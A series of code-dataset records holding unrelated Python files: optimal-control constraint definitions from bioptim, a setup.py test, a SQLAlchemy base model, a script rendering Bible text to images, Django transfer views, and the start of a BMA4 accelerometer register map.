\"\"\"\n custom_function = None\n if not isinstance(constraint, (ConstraintFcn, ImplicitConstraintFcn)):\n custom_function = constraint\n constraint = ConstraintFcn.CUSTOM\n\n super(Constraint, self).__init__(\n penalty=constraint, phase=phase, quadratic=quadratic, custom_function=custom_function, **params\n )\n\n if isinstance(constraint, ImplicitConstraintFcn):\n self.penalty_type = ConstraintType.IMPLICIT # doing this puts the relevance of this enum in question\n\n self.min_bound = min_bound\n self.max_bound = max_bound\n self.bounds = Bounds(interpolation=InterpolationType.CONSTANT)\n\n def set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList):\n super(Constraint, self).set_penalty(penalty, all_pn)\n self.min_bound = 0 if self.min_bound is None else self.min_bound\n self.max_bound = 0 if self.max_bound is None else self.max_bound\n\n def add_or_replace_to_penalty_pool(self, ocp, nlp):\n if self.type == ConstraintFcn.TIME_CONSTRAINT:\n self.node = Node.END\n\n super(Constraint, self).add_or_replace_to_penalty_pool(ocp, nlp)\n\n self.min_bound = np.array(self.min_bound) if isinstance(self.min_bound, (list, tuple)) else self.min_bound\n self.max_bound = np.array(self.max_bound) if isinstance(self.max_bound, (list, tuple)) else self.max_bound\n\n if self.bounds.shape[0] == 0:\n for i in self.rows:\n min_bound = (\n self.min_bound[i]\n if hasattr(self.min_bound, \"__getitem__\") and self.min_bound.shape[0] > 1\n else self.min_bound\n )\n max_bound = (\n self.max_bound[i]\n if hasattr(self.max_bound, \"__getitem__\") and self.max_bound.shape[0] > 1\n else self.max_bound\n )\n self.bounds.concatenate(Bounds(min_bound, max_bound, interpolation=InterpolationType.CONSTANT))\n elif self.bounds.shape[0] != len(self.rows):\n raise RuntimeError(f\"bounds rows is {self.bounds.shape[0]} but should be {self.rows} or empty\")\n\n def _add_penalty_to_pool(self, all_pn: PenaltyNodeList):\n if self.penalty_type == PenaltyType.INTERNAL:\n pool = all_pn.nlp.g_internal if all_pn is not None and all_pn.nlp else all_pn.ocp.g_internal\n elif self.penalty_type == ConstraintType.IMPLICIT:\n pool = all_pn.nlp.g_implicit if all_pn is not None and all_pn.nlp else all_pn.ocp.g_implicit\n elif self.penalty_type == PenaltyType.USER:\n pool = all_pn.nlp.g if all_pn is not None and all_pn.nlp else all_pn.ocp.g\n else:\n raise ValueError(f\"Invalid constraint type {self.contraint_type}.\")\n pool[self.list_index] = self\n\n def clear_penalty(self, ocp, nlp):\n if self.penalty_type == PenaltyType.INTERNAL:\n g_to_add_to = nlp.g_internal if nlp else ocp.g_internal\n elif self.penalty_type == ConstraintType.IMPLICIT:\n g_to_add_to = nlp.g_implicit if nlp else ocp.g_implicit\n elif self.penalty_type == PenaltyType.USER:\n g_to_add_to = nlp.g if nlp else ocp.g\n else:\n raise ValueError(f\"Invalid Type of Constraint {self.penalty_type}\")\n\n if self.list_index < 0:\n for i, j in enumerate(g_to_add_to):\n if not j:\n self.list_index = i\n return\n else:\n g_to_add_to.append([])\n self.list_index = len(g_to_add_to) - 1\n else:\n while self.list_index >= len(g_to_add_to):\n g_to_add_to.append([])\n g_to_add_to[self.list_index] = []\n\n\nclass ConstraintList(OptionList):\n \"\"\"\n A list of Constraint if more than one is required\n\n Methods\n -------\n add(self, constraint: Union[Callable, \"ConstraintFcn\"], **extra_arguments)\n Add a new Constraint to the list\n print(self)\n Print the ConstraintList to the console\n \"\"\"\n\n def add(self, constraint: Union[Callable, Constraint, Any], **extra_arguments: Any):\n \"\"\"\n Add a new constraint to the list\n\n Parameters\n ----------\n constraint: Union[Callable, Constraint, ConstraintFcn]\n The chosen constraint\n extra_arguments: dict\n Any parameters to pass to Constraint\n \"\"\"\n\n if isinstance(constraint, Constraint):\n self.copy(constraint)\n\n else:\n super(ConstraintList, self)._add(option_type=Constraint, constraint=constraint, **extra_arguments)\n\n def print(self):\n \"\"\"\n Print the ConstraintList to the console\n \"\"\"\n # TODO: Print all elements in the console\n raise NotImplementedError(\"Printing of ConstraintList is not ready yet\")\n\n\nclass ConstraintFunction(PenaltyFunctionAbstract):\n \"\"\"\n Internal (re)implementation of the penalty functions\n\n Methods\n -------\n inner_phase_continuity(ocp)\n Add continuity constraints between each nodes of a phase.\n inter_phase_continuity(ocp)\n Add phase transition constraints between two phases.\n inter_node_continuity(ocp)\n Add phase multi node constraints between specified nodes and phases.\n clear_penalty(ocp: OptimalControlProgram, nlp: NonLinearProgram, penalty: Constraint)\n Resets a penalty. A negative penalty index creates a new empty penalty.\n penalty_nature() -> str\n Get the nature of the penalty\n \"\"\"\n\n class Functions:\n \"\"\"\n Implementation of all the constraint functions\n \"\"\"\n\n @staticmethod\n def non_slipping(\n constraint: Constraint,\n all_pn: PenaltyNodeList,\n tangential_component_idx: int,\n normal_component_idx: int,\n static_friction_coefficient: float,\n ):\n \"\"\"\n Add a constraint of static friction at contact points constraining for small tangential forces.\n This function make the assumption that normal_force is always positive\n That is mu*normal_force = tangential_force. To prevent from using a square root, the previous\n equation is squared\n\n Parameters\n ----------\n constraint: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n tangential_component_idx: int\n Index of the tangential component of the contact force.\n [0] = x_indices, [1] = y_indices / or [0] = component\n normal_component_idx: int\n Index of the normal component of the contact force\n static_friction_coefficient: float\n Static friction coefficient\n \"\"\"\n\n nlp = all_pn.nlp\n\n if isinstance(tangential_component_idx, int):\n tangential_component_idx = [tangential_component_idx]\n elif not isinstance(tangential_component_idx, (tuple, list)):\n raise RuntimeError(\"tangential_component_idx must be a unique integer or a list of integer\")\n\n if isinstance(normal_component_idx, int):\n normal_component_idx = [normal_component_idx]\n elif not isinstance(normal_component_idx, (tuple, list)):\n raise RuntimeError(\"normal_component_idx must be a unique integer or a list of integer\")\n\n mu_squared = static_friction_coefficient**2\n constraint.min_bound = np.array([0, 0])\n constraint.max_bound = np.array([np.inf, np.inf])\n\n contact = all_pn.nlp.contact_forces_func(nlp.states.cx, nlp.controls.cx, nlp.parameters.cx)\n normal_contact_force_squared = sum1(contact[normal_component_idx, 0]) ** 2\n if len(tangential_component_idx) == 1:\n tangential_contact_force_squared = sum1(contact[tangential_component_idx[0], 0]) ** 2\n elif len(tangential_component_idx) == 2:\n tangential_contact_force_squared = (\n sum1(contact[tangential_component_idx[0], 0]) ** 2\n + sum1(contact[tangential_component_idx[1], 0]) ** 2\n )\n else:\n raise (ValueError(\"tangential_component_idx should either be x and y or only one component\"))\n\n slipping = vertcat(\n mu_squared * normal_contact_force_squared - tangential_contact_force_squared,\n mu_squared * normal_contact_force_squared + tangential_contact_force_squared,\n )\n return slipping\n\n @staticmethod\n def torque_max_from_q_and_qdot(constraint: Constraint, all_pn: PenaltyNodeList, min_torque=None):\n \"\"\"\n Non linear maximal values of joint torques computed from the torque-position-velocity relationship\n\n Parameters\n ----------\n constraint: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n min_torque: float\n Minimum joint torques. This prevent from having too small torques, but introduces an if statement\n \"\"\"\n\n nlp = all_pn.nlp\n if min_torque and min_torque < 0:\n raise ValueError(\"min_torque cannot be negative in tau_max_from_actuators\")\n\n bound = nlp.model.torqueMax(nlp.states[\"q\"].mx, nlp.states[\"qdot\"].mx)\n min_bound = BiorbdInterface.mx_to_cx(\n \"min_bound\",\n nlp.controls[\"tau\"].mapping.to_first.map(bound[1].to_mx()),\n nlp.states[\"q\"],\n nlp.states[\"qdot\"],\n )\n max_bound = BiorbdInterface.mx_to_cx(\n \"max_bound\",\n nlp.controls[\"tau\"].mapping.to_first.map(bound[0].to_mx()),\n nlp.states[\"q\"],\n nlp.states[\"qdot\"],\n )\n if min_torque:\n min_bound = if_else(lt(min_bound, min_torque), min_torque, min_bound)\n max_bound = if_else(lt(max_bound, min_torque), min_torque, max_bound)\n\n value = vertcat(nlp.controls[\"tau\"].cx + min_bound, nlp.controls[\"tau\"].cx - max_bound)\n\n n_rows = constraint.rows if constraint.rows else int(value.shape[0] / 2)\n constraint.min_bound = [0] * n_rows + [-np.inf] * n_rows\n constraint.max_bound = [np.inf] * n_rows + [0] * n_rows\n return value\n\n @staticmethod\n def time_constraint(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n The time constraint is taken care elsewhere, but must be declared here. This function therefore does nothing\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n return all_pn.nlp.tf\n\n @staticmethod\n def qddot_equals_forward_dynamics(_: Constraint, all_pn: PenaltyNodeList, with_contact: bool, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint accelerations and forward dynamic results\n It includes the inversion of mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n with_contact: bool\n True if the contact dynamics is handled\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n tau = nlp.states[\"tau\"].mx if \"tau\" in nlp.states.keys() else nlp.controls[\"tau\"].mx\n\n qddot = nlp.controls[\"qddot\"].mx if \"qddot\" in nlp.controls.keys() else nlp.states[\"qddot\"].mx\n if with_contact:\n model = biorbd.Model(\n nlp.model.path().absolutePath().to_string()\n ) # TODO: find a better solution if possible\n qddot_fd = model.ForwardDynamicsConstraintsDirect(q, qdot, tau).to_mx()\n else:\n qddot_fd = nlp.model.ForwardDynamics(q, qdot, tau).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"ForwardDynamics\", qddot - qddot_fd, *var)\n\n @staticmethod\n def tau_equals_inverse_dynamics(_: Constraint, all_pn: PenaltyNodeList, with_contact: bool, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint torques and inverse dynamic results\n It does not include any inversion of mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n with_contact: bool\n True if the contact dynamics is handled\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n tau = nlp.states[\"tau\"].mx if \"tau\" in nlp.states.keys() else nlp.controls[\"tau\"].mx\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n if nlp.external_forces:\n raise NotImplementedError(\n \"This implicit constraint tau_equals_inverse_dynamics is not implemented yet with external forces\"\n )\n # Todo: add fext tau_id = nlp.model.InverseDynamics(q, qdot, qddot, fext).to_mx()\n if with_contact:\n f_contact = nlp.controls[\"fext\"].mx if \"fext\" in nlp.controls.keys() else nlp.states[\"fext\"].mx\n count = 0\n f_contact_vec = biorbd.VecBiorbdVector()\n for ii in range(nlp.model.nbRigidContacts()):\n n_f_contact = len(nlp.model.rigidContactAxisIdx(ii))\n idx = [i + count for i in range(n_f_contact)]\n f_contact_vec.append(f_contact[idx])\n count = count + n_f_contact\n\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot, None, f_contact_vec).to_mx()\n\n else:\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"InverseDynamics\", tau_id - tau, *var)\n\n @staticmethod\n def implicit_marker_acceleration(_: Constraint, all_pn: PenaltyNodeList, contact_index: int, **unused_param):\n \"\"\"\n Compute the acceleration of the contact node to set it at zero\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n contact_index: int\n The contact index\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n # TODO get the index of the marker\n contact_name = nlp.model.contactNames()[contact_index].to_string()\n if \"_X\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 0\n elif \"_Y\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 1\n elif \"_Z\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 2\n contact_acceleration = nlp.model.rigidContactAcceleration(q, qdot, qddot, 0).to_mx()[idx_dir]\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([nlp.parameters[key] for key in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"contact_acceleration\", contact_acceleration, *var)\n\n @staticmethod\n def tau_from_muscle_equal_inverse_dynamics(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint torques from muscle and inverse dynamic results\n It does not include any inversion of mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n muscle_activations = nlp.controls[\"muscles\"].mx\n muscles_states = nlp.model.stateSet()\n for k in range(len(nlp.controls[\"muscles\"])):\n muscles_states[k].setActivation(muscle_activations[k])\n muscle_tau = nlp.model.muscularJointTorque(muscles_states, q, qdot).to_mx()\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n if nlp.external_forces:\n raise NotImplementedError(\n \"This implicit constraint tau_from_muscle_equal_inverse_dynamics is not implemented yet with external forces\"\n )\n # Todo: add fext tau_id = nlp.model.InverseDynamics(q, qdot, qddot, fext).to_mx()\n # fext need to be a mx\n\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"InverseDynamics\", tau_id - muscle_tau, *var)\n\n @staticmethod\n def implicit_soft_contact_forces(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n Compute the difference between symbolic soft contact forces and actual force contact dynamic\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n\n force_idx = []\n for i_sc in range(nlp.model.nbSoftContacts()):\n force_idx.append(3 + (6 * i_sc))\n force_idx.append(4 + (6 * i_sc))\n force_idx.append(5 + (6 * i_sc))\n\n soft_contact_all = nlp.soft_contact_forces_func(nlp.states.mx, nlp.controls.mx, nlp.parameters.mx)\n soft_contact_force = soft_contact_all[force_idx]\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"ForwardDynamics\", nlp.controls[\"fext\"].mx - soft_contact_force, *var)\n\n @staticmethod\n def inner_phase_continuity(ocp):\n \"\"\"\n Add continuity constraints between each nodes of a phase.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n\n # Dynamics must be sound within phases\n for nlp in ocp.nlp:\n penalty = Constraint(ConstraintFcn.CONTINUITY, node=Node.ALL_SHOOTING, penalty_type=PenaltyType.INTERNAL)\n penalty.add_or_replace_to_penalty_pool(ocp, nlp)\n\n @staticmethod\n def inter_phase_continuity(ocp):\n \"\"\"\n Add phase transition constraints between two phases.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n from ..limits.phase_transition import PhaseTransitionFcn\n\n for pt in ocp.phase_transitions:\n if pt.type == PhaseTransitionFcn.DISCONTINUOUS:\n continue\n # Dynamics must be respected between phases\n pt.name = f\"PHASE_TRANSITION {pt.phase_pre_idx}->{pt.phase_post_idx}\"\n pt.list_index = -1\n pt.add_or_replace_to_penalty_pool(ocp, ocp.nlp[pt.phase_pre_idx])\n\n @staticmethod\n def node_equalities(ocp):\n \"\"\"\n Add multi node constraints between chosen phases.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n for mnc in ocp.multinode_constraints:\n # Equality constraint between nodes\n first_node_name = f\"idx {str(mnc.first_node)}\" if isinstance(mnc.first_node, int) else mnc.first_node.name\n second_node_name = (\n f\"idx {str(mnc.second_node)}\" if isinstance(mnc.second_node, int) else mnc.second_node.name\n )\n mnc.name = (\n f\"NODE_EQUALITY \"\n f\"Phase {mnc.phase_first_idx} Node {first_node_name}\"\n f\"->Phase {mnc.phase_second_idx} Node {second_node_name}\"\n )\n mnc.list_index = -1\n mnc.add_or_replace_to_penalty_pool(ocp, ocp.nlp[mnc.phase_first_idx])\n\n @staticmethod\n def get_dt(_):\n return 1\n\n @staticmethod\n def penalty_nature() -> str:\n return \"constraints\"\n\n\nclass ConstraintFcn(FcnEnum):\n \"\"\"\n Selection of valid constraint functions\n\n Methods\n -------\n def get_type() -> Callable\n Returns the type of the penalty\n \"\"\"\n\n CONTINUITY = (PenaltyFunctionAbstract.Functions.continuity,)\n TRACK_CONTROL = (PenaltyFunctionAbstract.Functions.minimize_controls,)\n TRACK_STATE = (PenaltyFunctionAbstract.Functions.minimize_states,)\n TRACK_QDDOT = (PenaltyFunctionAbstract.Functions.minimize_qddot,)\n TRACK_MARKERS = (PenaltyFunctionAbstract.Functions.minimize_markers,)\n TRACK_MARKERS_VELOCITY = (PenaltyFunctionAbstract.Functions.minimize_markers_velocity,)\n SUPERIMPOSE_MARKERS = (PenaltyFunctionAbstract.Functions.superimpose_markers,)\n PROPORTIONAL_STATE = (PenaltyFunctionAbstract.Functions.proportional_states,)\n PROPORTIONAL_CONTROL = (PenaltyFunctionAbstract.Functions.proportional_controls,)\n TRACK_CONTACT_FORCES = (PenaltyFunctionAbstract.Functions.minimize_contact_forces,)\n TRACK_SEGMENT_WITH_CUSTOM_RT = (PenaltyFunctionAbstract.Functions.track_segment_with_custom_rt,)\n TRACK_MARKER_WITH_SEGMENT_AXIS = (PenaltyFunctionAbstract.Functions.track_marker_with_segment_axis,)\n TRACK_COM_POSITION = (PenaltyFunctionAbstract.Functions.minimize_com_position,)\n TRACK_COM_VELOCITY = (PenaltyFunctionAbstract.Functions.minimize_com_velocity,)\n TRACK_ANGULAR_MOMENTUM = (PenaltyFunctionAbstract.Functions.minimize_angular_momentum,)\n TRACK_LINEAR_MOMENTUM = (PenaltyFunctionAbstract.Functions.minimize_linear_momentum,)\n CUSTOM = (PenaltyFunctionAbstract.Functions.custom,)\n NON_SLIPPING = (ConstraintFunction.Functions.non_slipping,)\n TORQUE_MAX_FROM_Q_AND_QDOT = (ConstraintFunction.Functions.torque_max_from_q_and_qdot,)\n TIME_CONSTRAINT = (ConstraintFunction.Functions.time_constraint,)\n\n @staticmethod\n def get_type():\n \"\"\"\n Returns the type of the penalty\n \"\"\"\n\n return ConstraintFunction\n\n\nclass ImplicitConstraintFcn(FcnEnum):\n \"\"\"\n Selection of valid constraint functions\n\n Methods\n -------\n def get_type() -> Callable\n Returns the type of the penalty\n \"\"\"\n\n QDDOT_EQUALS_FORWARD_DYNAMICS = (ConstraintFunction.Functions.qddot_equals_forward_dynamics,)\n TAU_EQUALS_INVERSE_DYNAMICS = (ConstraintFunction.Functions.tau_equals_inverse_dynamics,)\n SOFT_CONTACTS_EQUALS_SOFT_CONTACTS_DYNAMICS = (ConstraintFunction.Functions.implicit_soft_contact_forces,)\n CONTACT_ACCELERATION_EQUALS_ZERO = (ConstraintFunction.Functions.implicit_marker_acceleration,)\n TAU_FROM_MUSCLE_EQUAL_INVERSE_DYNAMICS = (ConstraintFunction.Functions.tau_from_muscle_equal_inverse_dynamics,)\n\n @staticmethod\n def get_type():\n \"\"\"\n Returns the type of the penalty\n \"\"\"\n\n return ConstraintFunction\n\n\nclass ContinuityConstraintFunctions:\n \"\"\"\n Interface between continuity and constraint\n \"\"\"\n\n @staticmethod\n def continuity(ocp):\n \"\"\"\n The declaration of inner- and inter-phase continuity constraints\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n\n ConstraintFunction.inner_phase_continuity(ocp)\n\n # Dynamics must be respected between phases\n ConstraintFunction.inter_phase_continuity(ocp)\n\n if ocp.multinode_constraints: # TODO: they shouldn't be added here\n ConstraintFunction.node_equalities(ocp)\n","sub_path":"bioptim/limits/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":27563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"371940299","text":"from pathlib import Path\nimport re\n\nimport pytest\n\n\ndef test_setup_has_all_kernel_subpkgs():\n root = Path(__file__).parent.parent\n setup_py_content = (root / 'setup.py').read_text()\n for subpkg in (root / 'ai' / 'backend' / 'kernel').iterdir():\n if subpkg.is_dir() and subpkg.name != '__pycache__':\n rx = r\"^\\s+'ai\\.backend\\.kernel.{0}'\".format(subpkg.name)\n m = re.search(rx, setup_py_content, re.M)\n if m is None:\n pytest.fail(f'Kernel subpackage \"{subpkg.name}\" '\n 'is not registered to setup.py!!')\n","sub_path":"tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"292168486","text":"from app.utils import db\nfrom sqlalchemy import exc\nfrom datetime import datetime\nfrom app.utils import convert_to_camel_case\n\nclass BaseModel(db.Model):\n __abstract__ = True\n\n id = db.Column(db.Integer(), primary_key=True)\n is_deleted = db.Column(db.Boolean, default=False, nullable=False)\n created_at = db.Column(db.DateTime(), default=datetime.now())\n updated_at = db.Column(db.DateTime(), default=datetime.now(), onupdate=datetime.now())\n\n\n def save(self):\n try:\n db.session.add(self)\n db.session.commit()\n except(exc.IntegrityError, exc.InvalidRequestError):\n db.session().rollback()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n serialized = {\n convert_to_camel_case(column.name): getattr(self, column.name) for column in self.__table__.columns if column.name not in ['created_at', 'update_at']\n }\n return serialized\n","sub_path":"api/app/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"53431643","text":"import math\nimport sys\nsys.path.append(\"./\")\n\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw\n\nfrom utils.kjv_text import KJVTextDataset\n\nkjv = KJVTextDataset()\n\n# Derived from code at\n# https://nicholastsmith.wordpress.com/2017/10/14/deep-learning-ocr-using-tensorflow-and-python/\ndef makeImage(txt, font, filename, sz):\n img = Image.new('RGB', sz, \"white\")\n draw = ImageDraw.Draw(img)\n draw.text((0,0), txt, (0, 0, 0), font=font)\n img.save(filename)\n\nfont_size_in = 0.25\nfont_size_pt = int(font_size_in * 72.0)\nfont_path = \"utils/Andale-Mono.ttf\" # Specific to Mac OS -- change if needed\nfont = ImageFont.truetype(font_path, font_size_pt)\nchar_height, char_width = font.getsize(\"A\")[0:2]\n\nchars_per_line = 32\nlines_per_img = 32\nimage_dims_px = (char_height * chars_per_line, (font_size_pt + 3) * lines_per_img)\n\nprint(\"Image dimensions: (%d px x %d px)\" % (image_dims_px[0], image_dims_px[1]))\n\ntext_str_per_image = kjv.image_text(chars_per_line, lines_per_img)\nnum_imgs = len(text_str_per_image)\nprint(\"Creating %d images...\" % num_imgs)\nfor i in range(num_imgs):\n # Print update in place\n sys.stdout.write(\"\\r%d images processed (%d%% complete)\" % (i, int(i / float(num_imgs / 100.0))))\n sys.stdout.flush()\n\n txt = text_str_per_image[i].rstrip('\\n') # Strip off last newline for each image; Pillow doesn't like that...\n img_filename = \"images/%d.png\" % i\n makeImage(txt, font, img_filename, image_dims_px)\n# Insert newline to reset in-place update timer\nsys.stdout.write(\"\\r\\nImage creation complete!\\n\")\nsys.stdout.flush()\n","sub_path":"scripts/generate_images.py","file_name":"generate_images.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"65180222","text":"from django.views import generic\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom transfers.constants import TransferType\nfrom transfers.models import PS2TSTransfer, TS2PSTransfer\nfrom transfers.utils import fetch_ps2ts_list, fetch_ts2ps_list\n\nclass AssocDeanHomeView(generic.TemplateView):\n def get(self, request, *args, **kwargs): \n return render(request,\"transfers/ad_home.html\")\n\nclass AssocDeanLisApplicationstView(generic.ListView):\n def get(self, request, *args, **kwargs):\n if 'type' not in kwargs:\n type_of_request = None\n return redirect('/TMS/assoc-dean/home/')\n else:\n type_of_request = kwargs[\"type\"]\n if int(type_of_request) == TransferType.PS2TS.value:\n return_list = fetch_ps2ts_list()\n elif int(type_of_request) == TransferType.TS2PS.value:\n return_list = fetch_ts2ps_list()\n else:\n return_list = []\n return JsonResponse(return_list, safe=False)\n","sub_path":"transfers/views/assoc_dean_views.py","file_name":"assoc_dean_views.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318608849","text":"#\n#\tThis python code is based on code found in bma4.h and bma4.c by bosch: see copyright notice in bma4.h\n# The python coded that i added is under MIT licence (see license file) - franz schaefer schaefer@mond.at\n#\nfrom micropython import const\nimport time\nfrom ustruct import unpack\n\n\nBMA4_CHIP_ID_ADDR\t\t = const(0x00)\nBMA4_ERROR_ADDR\t\t= const(0x02)\nBMA4_STATUS_ADDR\t= const(0x03)\n\n# AUX/ACCEL DATA BASE ADDRESS REGISTERS \nBMA4_DATA_0_ADDR\t= const(0x0A)\nBMA4_DATA_8_ADDR\t= const(0x12)\n\n# SENSOR TIME REGISTERS\nBMA4_SENSORTIME_0_ADDR\t= const(0x18)\n\n# INTERRUPT/FEATURE STATUS REGISTERS\nBMA4_INT_STAT_0_ADDR\t= const(0x1C)\n\n# INTERRUPT/FEATURE STATUS REGISTERS\nBMA4_INT_STAT_1_ADDR\t= const(0x1D)\n\n# TEMPERATURE REGISTERS\nBMA4_TEMPERATURE_ADDR\t= const(0x22)\n\n# FIFO REGISTERS\nBMA4_FIFO_LENGTH_0_ADDR\t\t= const(0x24)\nBMA4_FIFO_DATA_ADDR\t\t\t= const(0x26)\n\n# ACCEL CONFIG REGISTERS\nBMA4_ACCEL_CONFIG_ADDR\t\t= const(0x40)\n\n# ACCEL RANGE ADDRESS\nBMA4_ACCEL_RANGE_ADDR\t\t= const(0x41)\n\n# AUX CONFIG REGISTERS\nBMA4_AUX_CONFIG_ADDR\t\t= const(0x44)\n\n# FIFO DOWN SAMPLING REGISTER ADDRESS FOR ACCEL\nBMA4_FIFO_DOWN_ADDR\t\t\t= const(0x45)\n\n# FIFO WATERMARK REGISTER ADDRESS\nBMA4_FIFO_WTM_0_ADDR\t\t= const(0x46)\n\n# FIFO CONFIG REGISTERS\nBMA4_FIFO_CONFIG_0_ADDR\t\t= const(0x48)\nBMA4_FIFO_CONFIG_1_ADDR\t\t= const(0x49)\n\n# MAG INTERFACE REGISTERS\nBMA4_AUX_DEV_ID_ADDR\t\t= const(0x4B)\nBMA4_AUX_IF_CONF_ADDR\t\t= const(0x4C)\nBMA4_AUX_RD_ADDR\t\t\t= const(0x4D)\nBMA4_AUX_WR_ADDR\t\t\t= const(0x4E)\nBMA4_AUX_WR_DATA_ADDR\t\t= const(0x4F)\n\n# INTERRUPT ENABLE REGISTERS\nBMA4_INT1_IO_CTRL_ADDR\t\t= const(0x53)\nBMA4_INT2_IO_CTRL_ADDR\t\t= const(0x54)\n\n# LATCH DURATION REGISTERS\nBMA4_INTR_LATCH_ADDR\t\t= const(0x55)\n\n# MAP INTERRUPT 1 and 2 REGISTERS\nBMA4_INT_MAP_1_ADDR\t\t\t= const(0x56)\nBMA4_INT_MAP_2_ADDR\t\t\t= const(0x57)\nBMA4_INT_MAP_DATA_ADDR\t\t= const(0x58)\nBMA4_INIT_CTRL_ADDR\t\t\t= const(0x59)\n\n# FEATURE CONFIG RELATED \nBMA4_RESERVED_REG_5B_ADDR\t\t= const(0x5B)\nBMA4_RESERVED_REG_5C_ADDR\t\t= const(0x5C)\nBMA4_FEATURE_CONFIG_ADDR\t\t= const(0x5E)\nBMA4_INTERNAL_ERROR\t\t\t= const(0x5F)\n\n# SERIAL INTERFACE SETTINGS REGISTER\nBMA4_IF_CONFIG_ADDR\t\t= const(0x6B)\n\n# SELF_TEST REGISTER\nBMA4_ACC_SELF_TEST_ADDR\t= const(0x6D)\n\n# SPI,I2C SELECTION REGISTER\nBMA4_NV_CONFIG_ADDR\t\t= const(0x70)\n\n# ACCEL OFFSET REGISTERS\nBMA4_OFFSET_0_ADDR\t\t= const(0x71)\nBMA4_OFFSET_1_ADDR\t\t= const(0x72)\nBMA4_OFFSET_2_ADDR\t\t= const(0x73)\n\n# POWER_CTRL REGISTER\nBMA4_POWER_CONF_ADDR\t= const(0x7C)\nBMA4_POWER_CTRL_ADDR\t= const(0x7D)\n\n# COMMAND REGISTER\nBMA4_CMD_ADDR\t\t= 